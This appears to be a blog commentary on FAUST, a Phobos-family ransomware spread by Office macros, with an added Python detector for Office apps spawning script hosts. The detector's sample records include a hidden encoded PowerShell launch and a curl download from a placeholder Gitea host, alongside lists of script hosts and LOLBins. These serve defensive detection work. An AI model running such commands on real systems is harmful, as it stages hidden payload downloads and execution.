According to Infosecurity Magazine, security researchers at FortiGuard Labs published an advisory last Thursday detailing a new ransomware variant called FAUST. This malware is part of the notorious Phobos family, which first emerged back in 2019 and works by encrypting files for a cryptocurrency ransom. The FAUST attack was found in a malicious Office document that uses a VBA script to spread, and the attackers cleverly used the Gitea service to host their Base64-encoded malicious files. Once loaded into a system’s memory, these files launch the encryption routine, and encrypted files receive the “.faust” extension. Victims are then told to contact the attackers via email or TOX message to negotiate payment, continuing the same old ransomware playbook.
The Macro Problem Isn’t Going Away
Here’s the thing that’s both frustrating and predictable: we’re still talking about Office macros in 2024. As John Bambenek from Bambenek Consulting pointed out, VBA provides functionality that businesses actually use, which is why disabling it entirely is often a non-starter for organizations. So we’re stuck in this cycle where a known, dangerous feature remains enabled because it’s useful. The advice to use Windows Defender Attack Surface Reduction rules—like blocking Office apps from creating child processes—is solid, but it feels like a game of whack-a-mole. How many more ransomware variants do we need to see delivered this way before the default setting becomes “off”?
Why Fileless Attacks Are So Tricky
The use of Gitea and memory injection is a slick move. It’s a fileless technique, meaning the malicious payload never really sits on the disk in a way traditional antivirus might easily catch. It’s loaded directly into memory from a seemingly legitimate code hosting service. This makes detection and forensic analysis harder. Combine that with FAUST’s other behaviors—like adding registry entries for persistence and checking for a mutex to avoid infecting the same host twice—and you’ve got a pretty robust piece of malware. It’s not groundbreaking, but it’s effectively using a mix of old and new tricks to get the job done.
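The two behaviours worth watching for in endpoint telemetry are the one the ASR rule above blocks (an Office application spawning a child process) and the tells of the in-memory staging described here (an encoded command or a download from a remote code-hosting URL in that child’s command line). The detector below is an added example, not code from the FortiGuard advisory or the article; it runs over constructed Sysmon-style process-creation records, and the allowlisted splwow64.exe print helper and the placeholder domain are assumptions.

```python
import re

# Office binaries whose child processes the ASR rule "Block all Office
# applications from creating child processes" would stop outright.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Script hosts and living-off-the-land binaries typically used to stage a payload in memory.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
# Assumed-benign child (print spooler helper); tune this allowlist to your own environment.
ALLOWED_CHILDREN = {"splwow64.exe"}
ENCODED_FLAG = re.compile(r"(?i)\s-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{8,}")
REMOTE_URL = re.compile(r"(?i)https?://\S+")

# Constructed sample records, not real telemetry. The domain is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFB"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl https://gitea.example.invalid/u/r/raw/p.txt"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "WINWORD.EXE /n report.docx"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\splwow64.exe",
     "CommandLine": "splwow64.exe 12288"},
]

def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return an alert dict for one process-creation record, or None if it looks benign."""
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    if parent not in OFFICE_APPS or child in ALLOWED_CHILDREN:
        return None
    reasons, severity = ["office_app_spawned_child"], "medium"
    cmd = ev.get("CommandLine", "")
    if child in SCRIPT_HOSTS:          # script host launched straight from Office
        reasons.append("script_host_child"); severity = "high"
    if ENCODED_FLAG.search(cmd):       # Base64-encoded command, the in-memory staging tell
        reasons.append("encoded_command"); severity = "high"
    if REMOTE_URL.search(cmd):         # payload fetched from a remote (code-hosting) URL
        reasons.append("remote_payload_url"); severity = "high"
    return {"parent": parent, "child": child, "severity": severity, "reasons": reasons}

def analyze(events):
    """Run score_event over a batch of records and keep only the alerts."""
    return [a for a in (score_event(e) for e in events) if a]
```

Run against the samples, only the two Office-to-script-host launches alert; the Word launch from Explorer and the allowlisted print helper do not.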
Layered Defense Is The Only Answer
So what do you do? You can’t just rely on one thing. Sarah Jones from Critical Start is right about the layered approach. User training is key, but let’s be real, someone will always click. That’s why technical controls are non-negotiable. Patching everything, using strong unique passwords with 2FA, and applying those ASR rules are the baseline. For industrial and operational technology environments, where a ransomware infection can halt physical production, this layered security is even more critical. In those settings, securing the human-machine interface is paramount, and hardened devices belong in a holistic defense strategy. It’s about building rings of defense, because the first one will eventually fail.
The Phobos Family Keeps Growing
FAUST isn’t an isolated incident. Phobos is like a franchise now, with different groups using and modifying its code. The article mentions the 8Base group as another major player using Phobos variants. This points to a worrying trend: ransomware-as-a-service (RaaS) is thriving. A core piece of malware gets developed, and then it’s leased out or copied by multiple criminal enterprises. FAUST is just the latest iteration. Until we make the initial access vectors—like malicious docs—much harder to exploit, we’ll keep seeing these new variants with different names but the same destructive outcome. The trajectory is clear: more of the same, just slightly repackaged.
